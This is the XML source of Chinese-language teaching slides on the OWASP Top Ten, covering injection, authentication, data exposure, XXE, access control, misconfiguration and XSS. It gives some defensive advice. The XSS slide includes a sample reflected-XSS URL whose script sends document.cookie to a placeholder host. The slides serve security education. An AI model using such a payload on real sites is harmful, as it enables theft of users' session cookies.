            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231100" y="2021400"/>
            <a:ext cx="6240376" cy="350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f24b9b62fb_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="493565"/>
            <a:ext cx="41046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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;gf24b9b62fb_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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80"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Open Web Application Security Project</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;gf24b9b62fb_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449700" y="1153500"/>
            <a:ext cx="57513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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A1 Injection 注入攻擊</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Google Shape;86;gf24b9b62fb_0_11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="449700" y="1526700"/>
            <a:ext cx="4267725" cy="2396025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;gf24b9b62fb_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859475" y="1526700"/>
            <a:ext cx="3985500" cy="3144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360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>若程式邏輯是只要輸入框滿足條件 (等於 true) 就可以拿到使用者資料，那駭客就算不需要知道使用者真實密碼也可以藉由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t> 輕易拿到使用者資料</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;gf24b9b62fb_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449700" y="4020675"/>
            <a:ext cx="57513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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A2 Broken Authentication 無效身分認證</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;gf24b9b62fb_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4630625" y="4354400"/>
            <a:ext cx="4267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7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>透過錯誤使用身份認證和會話(Session)管理功能，攻擊者能夠破解密碼或竊取 Session Token，或者利用其它開發漏洞來暫時性或永久性冒充其他用戶的身份。</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Google Shape;90;gf24b9b62fb_0_11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="498875" y="4354401"/>
            <a:ext cx="3985501" cy="1804889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;gf24b9b62fb_0_11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202100" y="5435000"/>
            <a:ext cx="217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用 http 連線而不是 https，或是用免費 wifi 讓駭客從中竊取</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f24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="493565"/>
            <a:ext cx="41046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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;gf24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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80"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Open Web Application Security Project</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;gf24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449700" y="1153500"/>
            <a:ext cx="57513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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A3 Sensitive Data Exposure 敏感資料外洩</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;gf24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498875" y="1532688"/>
            <a:ext cx="8346000" cy="3144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360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>駭客可以用任何攻擊手法 XSS、SQL Injection、甚至只是在旁便等著你沒登出的電腦來讓敏感資料外洩</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>＊＊防護建議＊＊</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>使用 SSL 加密連線進行資料傳輸</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>以加密、雜湊(hash)等方式保存敏感資料，例如帳號密碼</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>檢查系統防火牆規則設定，限制所需的連接埠，定期查看內部是否有對外大量不同目的 IP 之異常連線，與帳號活動。</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;gf24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498875" y="3294250"/>
            <a:ext cx="57513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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A4 XML External Entity, XML 外部處理器漏洞</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;gf24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538325" y="3845400"/>
            <a:ext cx="819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7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>駭客利用這些漏洞去存取沒有經過授權的功能或察看敏感資料、修改使用者數據、更改訪問權限等</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>前端可以做得事: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>僅打開面向外部網路的HTTP/HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不要連設定檔或其他檔都能讓駭客存取</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;gf24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498875" y="3594150"/>
            <a:ext cx="57513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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A5 Broken Access Control 無效的存取控管</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;gf24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538325" y="4438075"/>
            <a:ext cx="57513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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A6 Security Misconfiguration 不安全的組態設定</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;gf24b9b62fb_0_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538325" y="4727175"/>
            <a:ext cx="7519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a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>＊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系統管理或配置不當所造成的安全性漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就是你在 github 忘記用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .gitignore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t> 讓一些敏感資料例如資料庫存取密碼外流。或是管理 Google Drive 時分享變成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所有人都可以檢視導致一些敏感文件外流</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f24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="493565"/>
            <a:ext cx="41046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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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80"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>Open Web Application Security Project</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Google Shape;113;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449700" y="1153500"/>
            <a:ext cx="57513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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A7 XSS (Cross-Site Scripting) 跨站攻擊</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680400" y="1461671"/>
            <a:ext cx="8346000" cy="21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rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>當網站沒有做好的驗證，就可以讓駭客輕易輸入惡意程式碼在網站上</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用網址輸入欄來執行惡意程式碼，因為輸入當下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>馬上被執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所以稱為 Reflected XXS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://www.shop.com/search?query=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;document.location='http://xx?c='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistent/Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>同樣也是網站埋地雷，當使用者連到該網站便會遭受攻擊。一段惡意程式碼然後送出後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存到資料庫中</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM Based XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM Based 惡意程式碼沒有到 server 端被執行而是直接在 client 端就被執行</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
